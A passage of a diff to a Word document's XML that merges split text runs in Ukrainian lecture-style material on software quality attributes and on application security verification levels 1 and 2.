-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ійкість до відмов (fault tolerance) Здатність підтримувати заданий рівень працездатності при відмовах і порушеннях правил взаємодії з оточенням.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Стійкість до відмов (fault tolerance) Здатність підтримувати заданий рівень працездатності при відмовах і порушеннях правил взаємодії з оточенням.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5258,25 +4311,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Здатність до відновлення (recoverability). Здатність відновлювати певний </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>івень працездатності і цілісність даних після відмови, необхідні для цього час і ресурси.</w:t>
+        <w:t>Здатність до відновлення (recoverability). Здатність відновлювати певний рівень працездатності і цілісність даних після відмови, необхідні для цього час і ресурси.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5346,25 +4381,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Зрозумілість (understandability). Показник, зворотний до зусиль, витрачених користувачами, щоб сприйняти набі</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> понять, на яких засновано ПО, і їх застосовність для вирішення своїх завдань.</w:t>
+        <w:t>Зрозумілість (understandability). Показник, зворотний до зусиль, витрачених користувачами, щоб сприйняти набір понять, на яких засновано ПО, і їх застосовність для вирішення своїх завдань.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5456,25 +4473,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Продуктивність (efficiency) або ефективність. Здатність ПЗ при заданих умовах забезпечувати необхідну працездатність стосовно виділеним для цього ресурсів. Можна визначити її і як відношення одержуваних за допомогою ПЗ результатів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>до</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> витрачених на це ресурсів.</w:t>
+        <w:t>Продуктивність (efficiency) або ефективність. Здатність ПЗ при заданих умовах забезпечувати необхідну працездатність стосовно виділеним для цього ресурсів. Можна визначити її і як відношення одержуваних за допомогою ПЗ результатів до витрачених на це ресурсів.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5520,25 +4519,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ефективність використання ресурсів (resource utilisation). Здатність вирішувати потрібні завдання з використанням певних обсягів ресурсів певних видів. Маються на увазі такі ресурси, як оперативна і довгострокова </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>пам'ять</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>, мережеві з'єднання, пристрої введення і виведення, тощо.</w:t>
+        <w:t>Ефективність використання ресурсів (resource utilisation). Здатність вирішувати потрібні завдання з використанням певних обсягів ресурсів певних видів. Маються на увазі такі ресурси, як оперативна і довгострокова пам'ять, мережеві з'єднання, пристрої введення і виведення, тощо.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5608,25 +4589,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>аналізований (analyzability) або зручність проведення аналізу. Зручність проведення аналізу помилок, дефектів і недолі</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>к</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ів, а також зручність аналізу на предмет необхідних змін і їх можливих ефектів.</w:t>
+        <w:t>аналізований (analyzability) або зручність проведення аналізу. Зручність проведення аналізу помилок, дефектів і недоліків, а також зручність аналізу на предмет необхідних змін і їх можливих ефектів.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5672,43 +4635,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Зручність </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>перев</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ірки (testability). Показник, зворотний до трудовитрат на проведення тестування та інших видів перевірки того, що внесені зміни привели до потрібних ефекті</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Зручність перевірки (testability). Показник, зворотний до трудовитрат на проведення тестування та інших видів перевірки того, що внесені зміни привели до потрібних ефектів.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5777,25 +4704,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Адаптируемость (adaptability). Здатність ПЗ пристосовуватися до </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ізних оточенням без проведення для цього дій, крім заздалегідь передбачених.</w:t>
+        <w:t>Адаптируемость (adaptability). Здатність ПЗ пристосовуватися до різних оточенням без проведення для цього дій, крім заздалегідь передбачених.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5864,18 +4773,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Зручність заміни (replaceability) іншого ПО даними. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Здатність ПЗ використовуватися замість іншого ПО для вирішення тих же самих завдань в заданому оточенні.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Зручність заміни (replaceability) іншого ПО даними. Здатність ПЗ використовуватися замість іншого ПО для вирішення тих же самих завдань в заданому оточенні.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6059,27 +4958,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">можна виділити три </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>івні перевірки безпеки програмних додатків</w:t>
+        <w:t>можна виділити три рівні перевірки безпеки програмних додатків</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6105,7 +4984,6 @@
         <w:lastRenderedPageBreak/>
         <w:br/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6114,18 +4992,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>івень1 призначений для всіх програм.</w:t>
+        <w:t>Рівень1 призначений для всіх програм.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6142,7 +5009,6 @@
           <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6151,18 +5017,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>івень 2 призначений для додатків, які містять конфіденційні дані, які вимагають захисту.  </w:t>
+        <w:t>Рівень 2 призначений для додатків, які містять конфіденційні дані, які вимагають захисту.  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6537,51 +5392,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Елементи управління </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">івня 1 можуть бути забезпечені або автоматично за допомогою інструментів, або просто вручну без доступу до вихідного коду. Ми розглядаємо </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>івень 1 як мінімум необхідний для всіх додатків. Загрози для додатка, швидше за все, будуть від зловмисників, які використовують прості і маловитратні методи для виявлення легкодоступних і простих у використанні вразливостей.</w:t>
+        <w:t>Елементи управління рівня 1 можуть бути забезпечені або автоматично за допомогою інструментів, або просто вручну без доступу до вихідного коду. Ми розглядаємо рівень 1 як мінімум необхідний для всіх додатків. Загрози для додатка, швидше за все, будуть від зловмисників, які використовують прості і маловитратні методи для виявлення легкодоступних і простих у використанні вразливостей.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6684,7 +5495,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6693,9 +5503,8 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>рівня</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6704,7 +5513,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>івня</w:t>
+        <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6714,7 +5523,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
+        <w:t>або</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6724,7 +5533,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>або</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6734,6 +5543,36 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>стандарт</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>якщо</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -6744,7 +5583,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>стандарт</w:t>
+        <w:t>він</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6754,7 +5593,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">), </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6764,7 +5603,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>якщо</w:t>
+        <w:t>адекватно</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6784,7 +5623,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>він</w:t>
+        <w:t>захищає</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6804,7 +5643,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>адекватно</w:t>
+        <w:t>від</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6824,7 +5663,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>захищає</w:t>
+        <w:t>більшості</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6844,7 +5683,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>від</w:t>
+        <w:t>ризиків</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6854,6 +5693,46 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>пов</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>язаних</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -6864,7 +5743,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>більшості</w:t>
+        <w:t>з</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6884,7 +5763,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>ризиків</w:t>
+        <w:t>програмним</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6894,7 +5773,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6904,7 +5783,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>пов</w:t>
+        <w:t>забезпеченням</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6914,7 +5793,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>'</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6924,7 +5803,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>язаних</w:t>
+        <w:t>сьогодні</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6934,7 +5813,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6944,131 +5823,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>з</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>програмним</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>забезпеченням</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>сьогодні</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Рівень 2 забезпечує контроль безпеки на місці, ефективний і використовується в додатку. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>івень 2, як правило, підходить для додатків, обробних значні бізнес-бізнес операцій, в тому числі ті, які обробляють інформацію в галузі охорони здоров'я, реалізації бізнес-критичних або чутливих функцій або процесів інших чутливих активів. Загрози застосування 2-го рівня, як правило, будуть кваліфіковані та мотивовані атакуючі зосередивши увагу на конкретних задач з використанням інструментів і методі</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>, які високо практикували і ефективних на виявлення і використання слабких місць в додатках</w:t>
